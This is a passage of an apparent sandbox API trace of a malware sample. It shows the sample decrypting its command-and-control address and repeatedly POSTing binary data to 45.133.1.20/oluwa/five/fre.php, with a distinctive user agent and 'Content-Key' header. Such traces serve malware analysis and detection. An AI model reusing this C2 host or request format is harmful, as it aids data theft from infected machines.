/oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.782] GetProcessHeap () returned 0x6a0000 [0211.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0211.782] GetProcessHeap () returned 0x6a0000 [0211.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.782] send (s=0x5d4, buf=0x6bd460*, len=242, flags=0) returned 242 [0211.783] send (s=0x5d4, buf=0x6bb998*, len=159, flags=0) returned 159 [0211.783] GetProcessHeap () returned 0x6a0000 [0211.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0211.783] recv (in: s=0x5d4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0211.873] GetProcessHeap () returned 0x6a0000 [0211.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0211.873] GetProcessHeap () returned 0x6a0000 [0211.873] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0211.873] GetProcessHeap () returned 0x6a0000 [0211.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0211.874] GetProcessHeap () returned 0x6a0000 [0211.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0211.874] closesocket (s=0x5d4) returned 0 [0211.874] GetProcessHeap () returned 0x6a0000 [0211.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaf0 | out: hHeap=0x6a0000) returned 1 [0211.875] GetProcessHeap () returned 0x6a0000 [0211.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.875] GetProcessHeap () returned 0x6a0000 [0211.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0211.875] GetProcessHeap () returned 0x6a0000 [0211.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0211.876] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xaf0) returned 0x5d4 [0211.878] Sleep (dwMilliseconds=0xea60) [0211.880] GetProcessHeap () returned 0x6a0000 [0211.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0211.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.881] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.886] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0211.895] GetProcessHeap () returned 0x6a0000 [0211.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0211.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.896] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0211.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.897] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.898] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.898] GetProcessHeap () returned 0x6a0000 [0211.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0211.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.900] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0211.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.901] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0211.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.902] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0211.902] GetProcessHeap () returned 0x6a0000 [0211.902] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.903] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0211.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.904] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0211.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.905] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0211.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.906] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0211.906] GetProcessHeap () returned 0x6a0000 [0211.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0211.906] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0211.907] GetProcessHeap () returned 0x6a0000 [0211.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0211.907] GetProcessHeap () returned 0x6a0000 [0211.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0211.907] GetProcessHeap () returned 0x6a0000 [0211.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0211.908] GetProcessHeap () returned 0x6a0000 [0211.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0211.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.908] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0211.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.916] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0211.926] GetProcessHeap () returned 0x6a0000 [0211.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0211.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.927] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0211.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.928] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0211.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.929] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0211.929] GetProcessHeap () returned 0x6a0000 [0211.930] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0211.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.931] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0211.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.932] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0211.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0211.935] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0211.935] GetProcessHeap () returned 0x6a0000 [0211.935] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0211.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.936] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0211.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.937] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0211.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.938] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0211.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0211.939] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0211.939] GetProcessHeap () returned 0x6a0000 [0211.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0211.939] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0211.939] GetProcessHeap () returned 0x6a0000 [0211.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0211.939] socket (af=2, type=1, protocol=6) returned 0x5d8 [0211.940] connect (s=0x5d8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0211.963] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0211.963] GetProcessHeap () returned 0x6a0000 [0211.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0211.964] GetProcessHeap () returned 0x6a0000 [0211.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0211.964] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.967] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0211.967] GetProcessHeap () returned 0x6a0000 [0211.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0211.967] GetProcessHeap () returned 0x6a0000 [0211.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.967] GetProcessHeap () returned 0x6a0000 [0211.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0211.968] GetProcessHeap () returned 0x6a0000 [0211.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0211.968] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0211.969] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0211.969] GetProcessHeap () returned 0x6a0000 [0211.970] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0211.970] GetProcessHeap () returned 0x6a0000 [0211.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0211.970] send (s=0x5d8, buf=0x6bd460*, len=242, flags=0) returned 242 [0211.971] send (s=0x5d8, buf=0x6bb998*, len=159, flags=0) returned 159 [0211.971] GetProcessHeap () returned 0x6a0000 [0211.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0211.971] recv (in: s=0x5d8, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0212.048] GetProcessHeap () returned 0x6a0000 [0212.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0212.048] GetProcessHeap () returned 0x6a0000 [0212.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0212.049] GetProcessHeap () returned 0x6a0000 [0212.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0212.050] GetProcessHeap () returned 0x6a0000 [0212.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0212.051] closesocket (s=0x5d8) returned 0 [0212.052] GetProcessHeap () returned 0x6a0000 [0212.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0212.052] GetProcessHeap () returned 0x6a0000 [0212.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.052] GetProcessHeap () returned 0x6a0000 [0212.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0212.052] GetProcessHeap () returned 0x6a0000 [0212.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0212.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xadc) returned 0x5d8 [0212.055] Sleep (dwMilliseconds=0xea60) [0212.057] GetProcessHeap () returned 0x6a0000 [0212.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0212.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.059] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.065] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0212.073] GetProcessHeap () returned 0x6a0000 [0212.073] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c4b60 [0212.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.076] CryptImportKey (in: hProv=0x6bf278, pbData=0x6c4b60, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0212.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.078] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.079] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.079] GetProcessHeap () returned 0x6a0000 [0212.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4b60 | out: hHeap=0x6a0000) returned 1 [0212.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.081] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0212.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.082] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0212.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.083] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0212.083] GetProcessHeap () returned 0x6a0000 [0212.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.087] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0212.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.088] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0212.088] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.089] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0212.089] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.090] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0212.090] GetProcessHeap () returned 0x6a0000 [0212.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0212.090] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0212.090] GetProcessHeap () returned 0x6a0000 [0212.090] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0212.090] GetProcessHeap () returned 0x6a0000 [0212.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0212.091] GetProcessHeap () returned 0x6a0000 [0212.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0212.091] GetProcessHeap () returned 0x6a0000 [0212.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0212.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.092] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0212.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.098] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0212.116] GetProcessHeap () returned 0x6a0000 [0212.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0212.117] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.117] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0212.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.118] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0212.119] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.120] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0212.120] GetProcessHeap () returned 0x6a0000 [0212.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0212.121] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.122] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0212.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.141] CryptDestroyKey (hKey=0x6ad020) returned 1 [0212.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0212.143] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0212.143] GetProcessHeap () returned 0x6a0000 [0212.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0212.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.144] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0212.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.146] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0212.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.147] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0212.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0212.149] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0212.149] GetProcessHeap () returned 0x6a0000 [0212.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0212.149] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0212.149] GetProcessHeap () returned 0x6a0000 [0212.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa10 [0212.149] socket (af=2, type=1, protocol=6) returned 0x5dc [0212.150] connect (s=0x5dc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0212.177] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0212.177] GetProcessHeap () returned 0x6a0000 [0212.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0212.178] GetProcessHeap () returned 0x6a0000 [0212.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4f18 [0212.178] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0212.179] wvsprintfA (in: param_1=0x6c4f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0212.180] GetProcessHeap () returned 0x6a0000 [0212.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0212.180] GetProcessHeap () returned 0x6a0000 [0212.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0212.181] GetProcessHeap () returned 0x6a0000 [0212.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0212.181] GetProcessHeap () returned 0x6a0000 [0212.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4f18 [0212.182] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0212.183] wvsprintfA (in: param_1=0x6c4f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0212.183] GetProcessHeap () returned 0x6a0000 [0212.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0212.183] GetProcessHeap () returned 0x6a0000 [0212.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4f18 | out: hHeap=0x6a0000) returned 1 [0212.184] send (s=0x5dc, buf=0x6b5c98*, len=242, flags=0) returned 242 [0212.185] send (s=0x5dc, buf=0x6bb998*, len=159, flags=0) returned 159 [0212.185] GetProcessHeap () returned 0x6a0000 [0212.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4f18 